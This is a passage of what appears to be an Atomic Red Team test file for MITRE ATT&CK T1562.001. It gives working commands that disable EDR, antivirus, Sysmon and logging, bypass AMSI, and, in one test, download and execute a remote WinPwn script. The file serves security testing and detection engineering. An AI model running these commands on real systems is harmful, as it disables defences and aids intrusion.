by Windows Protected Process Light) by abusing the Process Explorer driver.
In combination this will halt any attempt to restart services and cause the
tool to crash.(Citation: Cocomazzi FIN7 Reboot)\n\nAdversaries may also tamper
with artifacts deployed and utilized by security tools. Security tools may
make dynamic changes to system components in order to maintain visibility
into specific events. For example, security products may load their own modules
and/or modify those loaded by processes to facilitate data collection. Similar
to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries
may unhook or otherwise modify these features added by tools (especially those
that exist in userland or are otherwise potentially accessible to adversaries)
to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System
Calls) For example, adversaries may abuse the Windows process mitigation policy
to block certain endpoint detection and response (EDR) products from loading
their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON
attribute using API calls like UpdateProcThreadAttribute, adversaries may
evade detection by endpoint security solutions that rely on DLLs that are
not signed by Microsoft. Alternatively, they may add new directories to an
EDR tool’s exclusion list, enabling them to hide malicious files via [File/Path
Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry
WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries
may also focus on specific applications such as Sysmon. For example, the “Start”
and “Enable” values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational
may be modified to tamper with and potentially disable Sysmon logging.(Citation:
disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to
skip digital signature verification checks by altering startup configuration
files and effectively disabling firmware verification that typically occurs
at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected
Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn
cloud environments, tools disabled by adversaries may include cloud monitoring
agents that report back to services such as AWS CloudWatch or Google Cloud
Monitor.\n\nFurthermore, although defensive tools may have anti-tampering
mechanisms, adversaries may abuse tools such as legitimate rootkit removal
kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation:
dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike)
For example, adversaries have used tools such as GMER to find and shut down
hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally,
adversaries may exploit legitimate drivers from anti-virus software to gain
access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)),
which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Gordon Long, LegioX/Zoom, asaurusrex
- Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security
- Nathaniel Quist, Palo Alto Networks
- Gal Singer, @galsinger29, Team Nautilus Aqua Security
- Daniel Feichter, @VirtualAllocEx, Infosec Tirol
- Cian Heasley
- Alex Soler, AttackIQ
- Sarathkumar Rajendran, Microsoft Defender365
- Lucas Heiligenstein
- Menachem Goldstein
- Nay Myo Hlaing (Ethan), DBS Bank
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- IaaS
- Linux
- macOS
- Network Devices
- Windows
x_mitre_version: '1.7'
identifier: T1562.001
atomic_tests:
- name: Disable syslog
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
description: 'Disables syslog collection
'
supported_platforms:
- linux
input_arguments:
package_checker:
description: Package checking command for linux.
type: string
default: "(rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q
installed)"
package_installer:
description: Package installer command for linux. Default yum
type: string
default: "(which yum && yum -y install epel-release rsyslog)||(which apt-get
&& apt-get install -y rsyslog)"
flavor_command:
description: Command to disable syslog collection. Default newer rsyslog
commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog
type: string
default: systemctl stop rsyslog ; systemctl disable rsyslog
cleanup_command:
description: Command to enable syslog collection. Default newer rsyslog
commands. i.e older command = service rsyslog start ; chkconfig rsyslog
on
type: string
default: systemctl start rsyslog ; systemctl enable rsyslog
dependency_executor_name: sh
dependencies:
- description: 'Package with rsyslog must be on system
'
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
'
get_prereq_command: "sudo #{package_installer} \n"
executor:
command: "#{flavor_command}\n"
cleanup_command: "#{cleanup_command}\n"
name: sh
elevation_required: true
- name: Disable syslog (freebsd)
auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf
description: 'Disables syslog collection
'
supported_platforms:
- linux
executor:
command: |
service syslogd stop
sysrc syslogd_enable="NO"
cleanup_command: |
sysrc syslogd_enable="YES"
service syslogd start
name: sh
elevation_required: true
- name: Disable Cb Response
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
description: 'Disable the Cb Response service
'
supported_platforms:
- linux
executor:
command: |
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
name: sh
- name: Disable SELinux
auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
description: 'Disables SELinux enforcement
'
supported_platforms:
- linux
dependencies:
- description: 'SELinux must be installed
'
prereq_command: 'which setenforce
'
get_prereq_command: 'echo "SELinux is not installed"; exit 1
'
executor:
command: 'setenforce 0
'
cleanup_command: 'setenforce 1
'
name: sh
elevation_required: true
- name: Stop Crowdstrike Falcon on Linux
auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
description: 'Stop and disable Crowdstrike Falcon on Linux
'
supported_platforms:
- linux
executor:
command: |
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
cleanup_command: |
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
name: sh
elevation_required: true
- name: Disable Carbon Black Response
auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
description: 'Disables Carbon Black Response
'
supported_platforms:
- macos
executor:
command: |
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
cleanup_command: |
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
name: sh
elevation_required: true
- name: Disable LittleSnitch
auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
description: 'Disables LittleSnitch
'
supported_platforms:
- macos
executor:
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
'
cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
'
name: sh
elevation_required: true
- name: Disable OpenDNS Umbrella
auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
description: 'Disables OpenDNS Umbrella
'
supported_platforms:
- macos
executor:
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
'
cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
'
name: sh
elevation_required: true
- name: Disable macOS Gatekeeper
auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
description: 'Disables macOS Gatekeeper
'
supported_platforms:
- macos
executor:
command: 'sudo spctl --master-disable
'
cleanup_command: 'sudo spctl --master-enable
'
name: sh
elevation_required: true
- name: Stop and unload Crowdstrike Falcon on macOS
auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon
on macOS
'
supported_platforms:
- macos
input_arguments:
falcond_plist:
description: The path of the Crowdstrike Falcon plist file
type: path
default: "/Library/LaunchDaemons/com.crowdstrike.falcond.plist"
userdaemon_plist:
description: The path of the Crowdstrike Userdaemon plist file
type: path
default: "/Library/LaunchDaemons/com.crowdstrike.userdaemon.plist"
executor:
command: |
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
cleanup_command: |
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}
name: sh
elevation_required: true
- name: Unload Sysmon Filter Driver
auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164
description: |
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
supported_platforms:
- windows
input_arguments:
sysmon_driver:
description: The name of the Sysmon filter driver (this can change from
the default)
type: string
default: SysmonDrv
dependency_executor_name: powershell
dependencies:
- description: 'Sysmon must be downloaded
'
prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr /i
Sysmon 2> nul") -or (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"))
{ exit 0 } else { exit 1 }
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sysmon" -Force
- description: 'sysmon must be Installed
'
prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else
{ exit 1 }
'
get_prereq_command: |
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i}
- description: 'sysmon filter must be loaded
'
prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0
} else { exit 1 }
'
get_prereq_command: |
if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i
}else{
sysmon -u
sysmon -accepteula -i
}
executor:
command: 'fltmc.exe unload #{sysmon_driver}
'
cleanup_command: |
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i > nul 2>&1
name: command_prompt
elevation_required: true
- name: Uninstall Sysmon
auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
'
supported_platforms:
- windows
input_arguments:
sysmon_exe:
description: The location of the Sysmon executable from Sysinternals (ignored
if sysmon.exe is found in your PATH)
type: path
default: PathToAtomicsFolder\T1562.001\bin\sysmon.exe
dependency_executor_name: powershell
dependencies:
- description: 'Sysmon executable must be available
'
prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1}
'
get_prereq_command: |
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
- description: 'Sysmon must be installed
'
prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1}
'
get_prereq_command: 'cmd /c sysmon -i -accepteula
'
executor:
command: 'sysmon -u
'
cleanup_command: 'sysmon -i -accepteula >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: AMSI Bypass - AMSI InitFailed
auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
name: powershell
- name: AMSI Bypass - Remove AMSI Provider Reg Key
auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
supported_platforms:
- windows
executor:
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Recurse
'
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
'
name: powershell
elevation_required: true
- name: Disable Arbitrary Security Windows Service
auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5
description: |
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
supported_platforms:
- windows
input_arguments:
service_name:
description: The name of the service to stop
type: string
default: McAfeeDLPAgentService
executor:
command: |
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
cleanup_command: |
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
name: command_prompt
elevation_required: true
- name: Tamper with Windows Defender ATP PowerShell
auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7
description: |
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
supported_platforms:
- windows
executor:
command: |
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
cleanup_command: |
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
name: powershell
elevation_required: true
- name: Tamper with Windows Defender Command Prompt
auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2
description: |
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
will be displayed twice and the WinDefend service status will be displayed.
supported_platforms:
- windows
executor:
command: |
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
cleanup_command: |
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
name: command_prompt
elevation_required: true
- name: Tamper with Windows Defender Registry
auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
description: |
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
supported_platforms:
- windows
executor:
command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
-Name DisableAntiSpyware -Value 1
'
cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
Defender" -Name DisableAntiSpyware -Value 0
'
name: powershell
elevation_required: true
- name: Disable Microsoft Office Security Features
auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
description: |
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
supported_platforms:
- windows
executor:
command: |
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
cleanup_command: |
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
name: powershell
- name: Remove Windows Defender Definition Files
auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
description: |
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
supported_platforms:
- windows
executor:
command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
-All
'
name: command_prompt
elevation_required: true
- name: Stop and Remove Arbitrary Security Windows Service
auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143
description: 'Beginning with Powershell 6.0, the Stop-Service cmdlet sends a
stop message to the Windows Service Controller for each of the specified services.
The Remove-Service cmdlet removes a Windows service in the registry and in
the service database.
'
supported_platforms:
- windows
input_arguments:
service_name:
description: The name of the service to remove
type: string
default: McAfeeDLPAgentService
executor:
command: |
Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
name: powershell
elevation_required: true
- name: Uninstall Crowdstrike Falcon on Windows
auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
description: 'Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is
not provided as an argument we need to search for it. Since the executable
is located in a folder named with a random guid we need to identify it before
invoking the uninstaller.
'
supported_platforms:
- windows
input_arguments:
falcond_path:
description: The Crowdstrike Windows Sensor path. The Guid always changes.
type: path
default: C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe
executor:
command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall
/quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include
"WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath
$_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList
-eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
name: powershell
elevation_required: true
- name: Tamper with Windows Defender Evade Scanning -Folder
auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
description: "Malware can exclude a specific path from being scanned and evading
detection. \nUpon successul execution, the file provided should be on the
list of excluded path. \nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
\n"
supported_platforms:
- windows
input_arguments:
excluded_folder:
description: This folder will be excluded from scanning
type: path
default: C:\Temp
executor:
command: |-
$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath
cleanup_command: |
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
name: powershell
elevation_required: true
- name: Tamper with Windows Defender Evade Scanning -Extension
auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
description: "Malware can exclude specific extensions from being scanned and
evading detection. \nUpon successful execution, the extension(s) should be
on the list of excluded extensions.\nTo check the exclusion list using poweshell
\ (Get-MpPreference).ExclusionExtension.\n"
supported_platforms:
- windows
input_arguments:
excluded_exts:
description: A list of extension to exclude from scanning
type: string
default: ".exe"
executor:
command: |-
$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension $excludedExts
cleanup_command: |
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Tamper with Windows Defender Evade Scanning -Process
auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
description: "Malware can exclude specific processes from being scanned and
evading detection.\nUpon successful execution, the process(es) should be on
the list of excluded processes. \nTo check the exclusion list using poweshell
\ (Get-MpPreference).ExclusionProcess.\"\n"
supported_platforms:
- windows
input_arguments:
excluded_process:
description: A list of processes to exclude from scanning
type: string
default: outlook.exe
executor:
command: |-
$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess
cleanup_command: |
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess
name: powershell
elevation_required: true
- name: office-365-Disable-AntiPhishRule
auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules
in your office-365 organization.
'
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: string
default:
password:
description: office-365 password
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
'
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
cleanup_command: "if(\"#{password}\" -ne \"\") {\n$secure_pwd = (\"#{password}\"
+ \"\") | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object
System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
$secure_pwd\nConnect-ExchangeOnline -Credential $creds\n$test = Get-AntiPhishRule\nEnable-AntiPhishRule
-Identity $test.Name -Confirm:$false\nGet-AntiPhishRule\n} \n"
name: powershell
elevation_required: false
- name: Disable Windows Defender with DISM
auto_generated_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58
description: "The following Atomic will attempt to disable Windows-Defender
using the built in DISM.exe, Deployment Image Servicing and Management tool.
\nDISM is used to enumerate, install, uninstall, configure, and update features
and packages in Windows images.\nA successful execution will not standard-out
any details. Remove the quiet switch if verbosity is needed.\nThis method
will remove Defender and it's package.\n"
supported_platforms:
- windows
executor:
command: Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove
/NoRestart /quiet
name: command_prompt
elevation_required: true
- name: Disable Defender Using NirSoft AdvancedRun
auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
description: "Information on NirSoft AdvancedRun and its creators found here:
http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe
with similar behavior identified during the WhisperGate campaign.\nSee https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nUpon
successful execution, AdvancedRun.exe will attempt to run and stop Defender,
and optionally attempt to delete the Defender folder on disk. \n"
supported_platforms:
- windows
input_arguments:
AdvancedRun_Location:
description: Path of Advanced Run executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe
delete_defender_folder:
description: Set to 1 to also delete the Windows Defender folder
type: integer
default: 0
dependency_executor_name: powershell
dependencies:
- description: 'Advancedrun.exe must exist at #{AdvancedRun_Location}
'
prereq_command: 'if(Test-Path -Path "#{AdvancedRun_Location}") {exit 0} else
{exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
executor:
command: |
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(#{delete_defender_folder}){
$CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}
cleanup_command: 'Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe"
/WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs
8 /Run} Catch{}
'
name: powershell
elevation_required: true
- name: Kill antimalware protected processes using Backstab
auto_generated_guid: 24a12b91-05a7-4deb-8d7f-035fa98591bc
description: |-
Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
https://github.com/Yaxser/Backstab
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of the protected process you want to kill/terminate.
type: string
default: MsMpEng.exe
dependency_executor_name: powershell
dependencies:
- description: Backstab64.exe should exist in ExtrnalPayloads Directory
prereq_command: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe")
{exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
executor:
command: '& "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" -k -n
#{process_name}
'
name: powershell
elevation_required: true
- name: WinPwn - Kill the event log services for stealth
auto_generated_guid: 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66
description: Kill the event log services for stealth via function of WinPwn
supported_platforms:
- windows
executor:
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
-consoleoutput -noninteractive "
name: powershell
- name: Tamper with Windows Defender ATP using Aliases - PowerShell
auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64
description: |
Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
supported_platforms:
- windows
executor:
command: |
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
cleanup_command: |
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
name: powershell
elevation_required: true
- name: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e
description: 'LockBit Black - Disable Privacy Settings Experience Using Registry
'
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience
/t REG_DWORD /d 1 /f
'
cleanup_command: 'reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE"
/v DisablePrivacyExperience /f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70
description: 'LockBit Black - Use Registry Editor to turn on automatic logon
'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
cleanup_command: |
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
